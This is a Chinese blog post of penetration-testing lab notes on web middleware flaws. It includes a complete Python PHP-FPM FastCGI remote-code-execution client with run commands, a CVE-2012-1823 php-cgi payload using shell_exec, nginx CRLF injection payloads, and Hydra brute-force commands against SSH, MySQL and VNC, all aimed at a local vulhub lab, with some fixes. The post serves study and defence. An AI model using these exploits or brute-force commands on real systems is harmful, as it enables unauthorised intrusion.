中间件渗透

最新推荐文章于 2024-04-18 15:11:07 发布
最新推荐文章于 2024-04-18 15:11:07 发布
阅读量428 收藏
点赞数
分类专栏: web 漏洞 安全 中间件 文章标签: IIS短文件名 fastcgi漏洞 phpcgi漏洞 nginx配置不当 hydra
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tryhard_go/article/details/84112346
版权
安全 同时被 3 个专栏收录
5 篇文章 0 订阅
订阅专栏
漏洞
3 篇文章 0 订阅
订阅专栏
中间件
3 篇文章 0 订阅
订阅专栏

IIS7.5文件路径解析漏洞

IIS短文件名机制

dir /x

iis短文件

短文件名猜解:

在C:\Inetpub\wwwroot创建一个aaaaaaaaaa.html文件

外部访问:进行猜解ip/~1***/a.aspx

修复

打开注册表:regedit

漏洞修复 1、升级.net framework

2、修改注册表键值: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSyste m修改NtfsDisable8dot3NameCreation为1

3、将web文件夹的内容拷贝到另一个位置,比如D:\www到 D:\www.back,然后删除原文件夹D:\www,再重命名D:\www.back到 D:\www

FASTCGI

中间件与PHP的结合方式:

CGI

FastCGI

Module

FastCGI Record

FastCGI是一种通信协议,是进行数据交换的通道

类比HTTP协议,FastCGI的record也包含头与体

工作原理:客户端请求服务器,服务器将客户端的请求,设置成FastCGI Record,发送给php-fpm,php-fpm按照FastCGI

的协议将TCP流解析成真正的数据。

中间件将请求按照FastCGI协议要求将内容变成如下的key-value,中间件将key-value发送给服务器,服务器执行SCRIPT_FILENAME指向的文件,进行解析发送回客户端

FastCGI Record

![FastCGI record](C:\Users\admin\Pictures\中间渗透\FastCGI record.PNG)

key-value

服务器与php-fpm交互过程,使用FastCGI type

![FastCGI type](C:\Users\admin\Pictures\中间渗透\FastCGI type.PNG)

未授权访问

攻击原理:

攻击者伪造FastCGI请求发送给服务器,构造payload将,将服务器解析路径设置自己可以控制输入的内容。

import socket
import random
import argparse
import sys
from io import BytesIO

# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client

PY2 = True if sys.version_info.major == 2 else False


def bchr(i):
    if PY2:
        return force_bytes(chr(i))
    else:
        return bytes([i])

def bord(c):
    if isinstance(c, int):
        return c
    else:
        return ord(c)

def force_bytes(s):
    if isinstance(s, bytes):
        return s
    else:
        return s.encode('utf-8', 'strict')

def force_text(s):
    if issubclass(type(s), str):
        return s
    if isinstance(s, bytes):
        s = str(s, 'utf-8', 'strict')
    else:
        s = str(s)
    return s


class FastCGIClient:
    """A Fast-CGI Client for Python"""

    # private
    __FCGI_VERSION = 1

    __FCGI_ROLE_RESPONDER = 1
    __FCGI_ROLE_AUTHORIZER = 2
    __FCGI_ROLE_FILTER = 3

    __FCGI_TYPE_BEGIN = 1
    __FCGI_TYPE_ABORT = 2
    __FCGI_TYPE_END = 3
    __FCGI_TYPE_PARAMS = 4
    __FCGI_TYPE_STDIN = 5
    __FCGI_TYPE_STDOUT = 6
    __FCGI_TYPE_STDERR = 7
    __FCGI_TYPE_DATA = 8
    __FCGI_TYPE_GETVALUES = 9
    __FCGI_TYPE_GETVALUES_RESULT = 10
    __FCGI_TYPE_UNKOWNTYPE = 11

    __FCGI_HEADER_SIZE = 8

    # request state
    FCGI_STATE_SEND = 1
    FCGI_STATE_ERROR = 2
    FCGI_STATE_SUCCESS = 3

    def __init__(self, host, port, timeout, keepalive):
        self.host = host
        self.port = port
        self.timeout = timeout
        if keepalive:
            self.keepalive = 1
        else:
            self.keepalive = 0
        self.sock = None
        self.requests = dict()

    def __connect(self):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(self.timeout)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # if self.keepalive:
        #     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 1)
        # else:
        #     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 0)
        try:
            self.sock.connect((self.host, int(self.port)))
        except socket.error as msg:
            self.sock.close()
            self.sock = None
            print(repr(msg))
            return False
        return True

    def __encodeFastCGIRecord(self, fcgi_type, content, requestid):
        length = len(content)
        buf = bchr(FastCGIClient.__FCGI_VERSION) \
               + bchr(fcgi_type) \
               + bchr((requestid >> 8) & 0xFF) \
               + bchr(requestid & 0xFF) \
               + bchr((length >> 8) & 0xFF) \
               + bchr(length & 0xFF) \
               + bchr(0) \
               + bchr(0) \
               + content
        return buf

    def __encodeNameValueParams(self, name, value):
        nLen = len(name)
        vLen = len(value)
        record = b''
        if nLen < 128:
            record += bchr(nLen)
        else:
            record += bchr((nLen >> 24) | 0x80) \
                      + bchr((nLen >> 16) & 0xFF) \
                      + bchr((nLen >> 8) & 0xFF) \
                      + bchr(nLen & 0xFF)
        if vLen < 128:
            record += bchr(vLen)
        else:
            record += bchr((vLen >> 24) | 0x80) \
                      + bchr((vLen >> 16) & 0xFF) \
                      + bchr((vLen >> 8) & 0xFF) \
                      + bchr(vLen & 0xFF)
        return record + name + value

    def __decodeFastCGIHeader(self, stream):
        header = dict()
        header['version'] = bord(stream[0])
        header['type'] = bord(stream[1])
        header['requestId'] = (bord(stream[2]) << 8) + bord(stream[3])
        header['contentLength'] = (bord(stream[4]) << 8) + bord(stream[5])
        header['paddingLength'] = bord(stream[6])
        header['reserved'] = bord(stream[7])
        return header

    def __decodeFastCGIRecord(self, buffer):
        header = buffer.read(int(self.__FCGI_HEADER_SIZE))

        if not header:
            return False
        else:
            record = self.__decodeFastCGIHeader(header)
            record['content'] = b''
            
            if 'contentLength' in record.keys():
                contentLength = int(record['contentLength'])
                record['content'] += buffer.read(contentLength)
            if 'paddingLength' in record.keys():
                skiped = buffer.read(int(record['paddingLength']))
            return record

    def request(self, nameValuePairs={}, post=''):
        if not self.__connect():
            print('connect failure! please check your fasctcgi-server !!')
            return

        requestId = random.randint(1, (1 << 16) - 1)
        self.requests[requestId] = dict()
        request = b""
        beginFCGIRecordContent = bchr(0) \
                                 + bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \
                                 + bchr(self.keepalive) \
                                 + bchr(0) * 5
        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,
                                              beginFCGIRecordContent, requestId)
        paramsRecord = b''
        if nameValuePairs:
            for (name, value) in nameValuePairs.items():
                name = force_bytes(name)
                value = force_bytes(value)
                paramsRecord += self.__encodeNameValueParams(name, value)

        if paramsRecord:
            request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)
        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)

        if post:
            request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)
        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)

        self.sock.send(request)
        self.requests[requestId]['state'] = FastCGIClient.FCGI_STATE_SEND
        self.requests[requestId]['response'] = b''
        return self.__waitForResponse(requestId)

    def __waitForResponse(self, requestId):
        data = b''
        while True:
            buf = self.sock.recv(512)
            if not len(buf):
                break
            data += buf

        data = BytesIO(data)
        while True:
            response = self.__decodeFastCGIRecord(data)
            if not response:
                break
            if response['type'] == FastCGIClient.__FCGI_TYPE_STDOUT \
                    or response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
                if response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
                    self.requests['state'] = FastCGIClient.FCGI_STATE_ERROR
                if requestId == int(response['requestId']):
                    self.requests[requestId]['response'] += response['content']
            if response['type'] == FastCGIClient.FCGI_STATE_SUCCESS:
                self.requests[requestId]
        return self.requests[requestId]['response']

    def __repr__(self):
        return "fastcgi connect host:{} port:{}".format(self.host, self.port)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Php-fpm code execution vulnerability client.')
    parser.add_argument('host', help='Target host, such as 127.0.0.1')
    parser.add_argument('file', help='A php file absolute path, such as /usr/local/lib/php/System.php')
    parser.add_argument('-c', '--code', help='What php code your want to execute', default='<?php phpinfo(); exit; ?>')
    parser.add_argument('-p', '--port', help='FastCGI port', default=9000, type=int)

    args = parser.parse_args()

    client = FastCGIClient(args.host, args.port, 3, 0)
    params = dict()
    documentRoot = "/"
    uri = args.file
    content = args.code
    params = {
        'GATEWAY_INTERFACE': 'FastCGI/1.0',
        'REQUEST_METHOD': 'POST',
        'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),
        'SCRIPT_NAME': uri,
        'QUERY_STRING': '',
        'REQUEST_URI': uri,
        'DOCUMENT_ROOT': documentRoot,
        'SERVER_SOFTWARE': 'php/fcgiclient',
        'REMOTE_ADDR': '127.0.0.1',
        'REMOTE_PORT': '9985',
        'SERVER_ADDR': '127.0.0.1',
        'SERVER_PORT': '80',
        'SERVER_NAME': "localhost",
        'SERVER_PROTOCOL': 'HTTP/1.1',
        'CONTENT_TYPE': 'application/text',
        'CONTENT_LENGTH': "%d" % len(content),
        'PHP_VALUE': 'auto_prepend_file = php://input',			#设置伪协议控制输入输出	
        'PHP_ADMIN_VALUE': 'allow_url_include = On'				#开启文件包含权限
    }
    response = client.request(params, content)
    print(force_text(response))

攻击方法

1、安装docker
curl -s https://get.docker.com/|sh
查看安装:docker -V
2、安装python-pip
sudo apt-get install pip
3、安装docker-compose
pip install docker-compose
4、将vulhub解压到一个路径下:/vulhub/vulhub-master/进入fpm文件,docker-compose up 启动服务
访问docker ps查看进程,9000映射成功
5、进入docker查看,找一个php文件查看。
6、设置payload
创建fpm.py,
7、执行代码
python fpm.py 10.10.10.131 /etc/passwd
python fpm.py 10.10.10.131 /usr/local/lib/php/PEAR.php
8、利用命令进行任意命令执行复现
python fpm.py 10.10.10.131 /usr/local/lib/php/PEAR.php -c '<?php echo `pwd`; ?>' 
python fpm.py 10.10.10.131 /usr/local/lib/php/PEAR.php -c '<?php echo `id`; ?>'

PHPCGI远程代码执行

PHP-CGI是php自带的FastCGI管理器,PHP-CGI的不足

1、PHP-CGI变更php.in配置后需重启php-cgi才能让新的php-ini生效,不可以平滑重启

2、直接杀死php-cgi进程php就不能运行了。PHP-FPM和Spawn-FCGI就没有这个问题,守护进程会平滑从新生成新的子进程。

CGI是一个中间件

CGI通用网关接口,能够让服务器方便的调用外部程序

CGI:用户每发送一个请求,CGI都会创建一个子进程执行请求,将执行结果返回给用户,然后结束子进程

导致CGI模式运行的网站不能同时接受大量请求

FastCGI:将进程一直运行在后台,接收数据包,执行后返回结果,自身不退出

CGI模式下的参数:

-c指定php.ini文件的位置

-n不要加载php.ini文件

-d指定配置项

-b启动fastcgi进程

-s显示文件源码

-T执行指定次该文件

-h-?显示帮助

CVE-2012-1823

漏洞成因

将if(!cgi)getopt(…)在配置文件中被删除了 不允许执行外来变量

构造payload

POST /index.php?-d+allow_url_include%3don±d+auto_prepend_file%3dphp%3a//input HTTP/1.1

<?php echo shell_exec("id");?>

CVE-2012-2311

新版本5.4.2及5.3.12,但这个修复不是完全的,可以绕过,进而衍生出CVE-2012-2311漏洞

CVE-2012-2311

通过使用空白加-的方式,也能传入参数。这时候第一个字符就是空白符而不是-了,绕过了上述检查。于是,php5.4.3和php5.3.13中继续进行修改先跳过所有空白符(小于等于空格的所有字符),再判断第一个字符是否是-

Spawn-FCGI

Spawn-FCGI是一个通用的FastCGI管理服务器,它是lighttpd中的一部分,很多人都用Lighttpd的Spawn-FCGI模式的管理工作,不过有不少缺点。而PHP-FPM的出现多少缓解了一些问题,但PHP-FPM有个缺点就是要重新编译,这对于一些已经运行的环境有可能有不小的风险,在php 5.3.3中可以直接使用PHP-FPM了。Spawn-FCGI的代码很少,全部才630行,用c语言编写,最近一次提交是5年前。代码主页:https://github.com/lighttpd/spawn-fcgi

代码分析

1、spawn-fcgi 首先create socket,bind,listen 3步创建服务器socket,(把这个socket叫做 fcgi_fd)
2、用dup2,把fcgi_fd 交换给 FCGI_LISTENSOCK_FILENO (FCGI_LISTENSOCK_FILENO数值上等于0,这是fastcgi协议当中指定用来listen的socket id)

3执行execl ,replaces the current process image with a new process image. process image 进程在运行空间的代码段

Nginx配置不当

http://www.baidu.com -> https://www.baidu.com

baidu.com->https://www.baidu.com

nginx配置文件

$uri:解码后请求路径,不含

$document_uri:解码后请求路径,不含参数

$request_uri:完整的URI,不解码

查看Nginx配置文件cat /etc/nginx/conf.d/error1.conf

配置文件目录:~/vulhub-master/nginx/insecure-configuration/configuration

漏洞成因:

CRLR是"回车+换行"(\r\n)的简称

HTTP Header与HTTP Body是用两个CRLF分隔的,浏览器根据两个CRLF来取出HTTP内容并显示出来

通过控制HTTP消息头中的字符,注入一些恶意的换行,就能注入一些会话Cookie或者HTML代码

CRLF注入

正常跳转页面

nginx.error1正常跳转页面

会话固定:

10.10.10.131:8080%0aSet-cookie:JSPSESSID%3D360

nginx.error1会话固定

反射型XSS

10.10.10.131:8080/%0d%0a%0d%0a

![nginx error1反射型](C:\Users\admin\Pictures\中间渗透\nginx error1反射型.PNG)

为什么不会弹窗?

浏览器FIilter对XSS特征进行了过滤,并且浏览器进行了跳转

如何组织浏览器跳转,参考链接:

https://www.leavesongs.com/PENETRATION/bottle-crlf-cve-2016-9964.html

https://www.leavesongs.com/PENETRATION/Sina-CRLF-Injection.html

修复方法

使用不解析的URI跳转

$request_uri:完整的URI,不解码

nginx。error1修复

另任何可以设置HTTP头的场景都会出现CRLF注入问题

目录穿越

漏洞成因:

error2漏洞成因

修复方法:

location /files/ {

alias /home/;

}

error2漏洞成因

Hydra爆破

hydra常用语法

hydra -l admin -p password ftp://localhost/

hydra -L default_logins.txt -p test ftp://loaclhost/

hydra -l admin -P common_passwords.txt ftp://localhost/

hydra -L logins.txt -P passwords.txt ftp://loaclhost/

ssh爆破:

hydra -L user.txt -P password.txt ssh://10.10.10.131

VNC爆破:

hydra -P password.txt vnc://10.10.10.131

Mysql爆破:

hydra L user.txt -P password.txt mysql://10.10.10.131

web登录爆破

hydra -l admin -P password.txt http-get://10.10.10.131/login.html

目录: /etc/crontab crontab 虚拟机计划任务

rsync非授权访问

修复:

hosts allow=127.0.0.1 允许指定ip

设置用户名密码:

auth users=rsync

secret file=/etc/rsyncd.passwd

/etc/rsyncd.passwd 需手动创建,格式为username:password

tryhard_go
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpcgi 代码执行 (CVE-2012-1823) 复现
m0_49936858的博客
08-22 559
CGI全称是“通用网关接口”(Common Gateway Interface), 它可以让一个客户端,从网页浏览器向执行在Web服务器上的程序请求数据 这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是只http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。可见,获取querystring后进行解码,如果第一个字符是-则设置skip_getopt,也就是不要获取命令行参数。
php cgi 执行,PHP-CGI远程任意代码执行漏洞
weixin_42525672的博客
03-10 544
PHP-CGI远程任意代码执行漏洞发布日期:2012-05-03更新日期:2012-05-04受影响系统:PHP PHP描述:--------------------------------------------------------------------------------CVE ID: CVE-2012-1823PHP是一种HTML内嵌式的语言,PHP与微软的ASP颇有几分相似,都是...
Web中间件常见安全漏洞总结_web中间件常见漏洞总结,干货来袭
最新发布
2401_84300070的博客
04-18 396
PHP根据URL映射,在服务器上寻找xxx.php文件,但是xxx.php不存在,又由于cgi.fix_pathinfo默认是开启的,因此PHP会继续检查路径中存在的文件,并将多余的部分当作 PATH_INFO。接着PHP在文件系统中找到.jpg文件,而后以PHP的形式执行.jpg的内容,并将/xxx.php存储在 PATH_INFO 后丢弃,因此我们在phpinfo中的$_SERVER[‘PATH_INFO’]看的到值为空。
【C/C++服务器开发】中间件的含义及常用中间件介绍
qq_41854911的博客
11-26 7299
文章目录一、中间件的定义中间件一词的由来中间件的定义什么不是中间件评判关键中间件的好处中间件分类常用基础中间件中间件云产品二、中间件的开发什么是中间件开发?中间件开发人员需要哪些素质?如何成为中间件开发人员?三、MySQL和NoSQL关系型数据库是什么?关系型数据库基本概念结构化查询语言数据定义语言(DDL)数据查询语言(Data Query Language, DQL)数据操纵语言(Data Manipulation Language, DML)数据控制语言(Data Control Language,
消息中间件概述
weixin_57763462的博客
05-04 809
分布式系统消息通信技术主要包括以下几种: 1. RPC(Remote Procedure Call Protocol). 一般是C/S方式,同步的,跨语言跨平台,面向过程 2. CORBA(Common Object Request Broker Architecture). CORBA从概念上扩展了RPC。面向对象的,企业级的(面向对象中间件还有DCOM) 3. RMI(Remote Method Invocation). 面向对象方式的 Java RPC 4....
PHP-FPM Fastcgi 未授权访问漏洞
weixin_30519071的博客
01-10 648
漏洞原理 Fastcgi Fastcgi是一个通信协议,和HTTP协议一样,都是进行数据交换的一个通道。HTTP协议是浏览器和服务器中间件进行数据交换的协议,浏览器将HTTP头和HTTP体用某个规则组装成数据包,以TCP的方式发送到服务器中间件,服务器中间件按照规则将数据包解码,并按要求拿到用户需要的数据,再以HTTP协议的规则打包返回给服务器。类比HTTP协议来说,fastcgi协议则是服务器中...
常见中间件漏洞总结PPT
01-25
常见中间件漏洞总结PPT,内含tomcat、weblogic、Nginx、iis、jboss等的常见漏洞和介绍,培训学习均可用。
中间件漏洞详解
06-11
本课程分别从iis5.x/6、iis7、apache三个中间件漏洞进行分析,首先从原理上介绍形成该漏洞的原因,而后通过实战的形式演示怎么利用这三种漏洞对服务器进行攻击。
常考渗透测试面试题.pdf
09-29
本文总结了渗透测试面试题,涵盖了渗透测试的各种知识点,包括漏洞类型、漏洞原理、修复方案、工具使用、Webshell上传、SQL注入、XSS、CSRF、SSRF、XML注入、逻辑漏洞、越权访问、Java和PHP框架、中间件解析漏洞等。...
人工智能-项目实践-检测-在渗透测试中快速检测常见中间件、组件的高危漏洞.zip
12-23
人工智能-项目实践-检测-在渗透测试中快速检测常见中间件、组件的高危漏洞 vulnerability-list 常见漏洞快速检测,目前包含以下漏洞的检测。 测试环境为win10,python3。 使用前需安装相关库:py -3 -m pip install...
渗透测试面试题2019版.docx
04-30
我们可以通过服务器指纹识别来获取服务器的操作系统版本、Web中间件版本、开放端口等信息,从而判断服务器是否存在已知的漏洞。 3.漏洞扫描 漏洞扫描是渗透测试中的一种重要步骤。我们可以使用漏洞扫描工具来检测...
秋招笔记:2018阿里中间件部门C/C++岗在线测评
沉醉不知归路的博客
07-17 2215
题目: 今天我们看到的阿里巴巴提供的任何一项服务后边都有着无数子系统和组件的支撑,子系统之间也互相依赖关联, 其中任意一个环节出现问题都可能对上游链路产生影响。小明做为新人接收到的第一个任务就是去梳理所有的依赖关系, 小明和每个系统的负责人确认了依赖关系,记录下调用对应系统的耗时,用这些数据分析端到端链路的数目和链路上最长的耗时。 输入: 小明搜集到的系统耗时和依赖列表 5 4 /...
phpinfo函数_文件包含之通过phpinfo去Getshell
weixin_39528994的博客
12-04 1799
1.phpinfo信息利用phpinfo文件泄露一直被大家所忽视,但其实phpinfo可以为攻击渗透测试人员提供很多的信息。1.system提供服务器所在的操作系统的信息。2.真实ip知道真实ip的我们可以省去cdn带来的各种困扰。我们同时也可以端口旁站一顿操作。3.web根目录网站绝对路径对渗透测试相当的有用,当你找到SQL注入点时,要上传木马的时候就需要知道网站的绝对路径才可以获取w...
文件解析漏洞
tryhard_go的博客
11-16 158
apache文件解析漏洞 漏洞环境 docker apache 漏洞成因 配置不当 实验步骤 (1)开启docker镜像 查看镜像:docker images 端口映射:docker it -d -p apache2:v2 90:80 /bin/bash 进入镜像:docker exec -it 进程号 /bin/bash 开启服务:service apache2 /bin/bash (2)进入...
php怎么将读取的两条数据的值放在一起_攻击PHP-FPM 实现Bypass Disable Functions
weixin_39922769的博客
11-21 76
最近蚁剑有个更新 ,其中有一条是Bypass Disable Functions插件的更新,绕过Disable Functions的原理是利用直接用 Webshell 请求 PHP-FPM/FastCGI,对于此种情况前段时间刚好遇到,其实也寻找了一些Bypass Disable Functions的方案,但是没有去深入研究过,正好趁最近实习不太忙,学习一下此种攻击方式。1. PHP-FPM介绍这...
网络安全技术方面渗透测试入门笔记
helloyouj的博客
07-26 1万+
一、网站基础与信息收集 http://192.168.80.128/shownnew.asp?id=16 访问的是网站中的那个网页? shownews.asp 这是一个静态还是动态网页? asp脚本程序写的 静态网页:内容固定不变,文件扩展名通常为。html、.htm\.shtml 动态网页:可以与后台数据库进行交互和数据库传递。同一个网页文件能工具不同的请求 显示
Ubuntu安装软件出现 Check your internet connection 问题的解决办法
热门推荐
夜空下的凝视
06-25 4万+
只需使用以下内容替换 /etc/apt/sources.list 中的内容: #deb cdrom:[Ubuntu 16.04 LTS _Xenial Xerus_ - Release amd64 (20160420.1)]/ xenial main restricted deb http://archive.ubuntu.com/ubuntu xenial main restricted uni...
Windows渗透与提权:技巧总结篇
Coisini的博客
06-23 1683
旁站路径问题: 1、读网站配置。 2、用以下VBS: On Error Resume Next If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then MsgBox Space(12) &amp; "IIS Virtual Web Viewer" &amp; Space(12) &amp; Chr(13)...
centors7无法ping百度解决办法
tryhard_go的博客
02-12 540
centors7无法ping百度 刚入门菜鸟经常遇到虚拟机无法ping百度,每次总是查查查,这次自己理理思路,加强自身记忆,希望也能对其他学习的同学有所帮助。 一查看网关是否设置正确 设置网关 vim /etc/sysconfig/network 如下: NETWORKING=yes HOSTNAME=localhost.localdomain GATEWAY=192.168.43.1 查看解析地...
主机、数据库、中间件、应用的渗透测试用例
06-06
3. 中间件渗透测试用例: - 中间件服务识别,识别目标中间件服务类型和版本信息。 - 弱口令攻击,尝试使用常见的用户名和密码组合进行登录尝试。 - 中间件漏洞扫描,检查中间件是否存在已知的漏洞和弱点。 - 会话...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值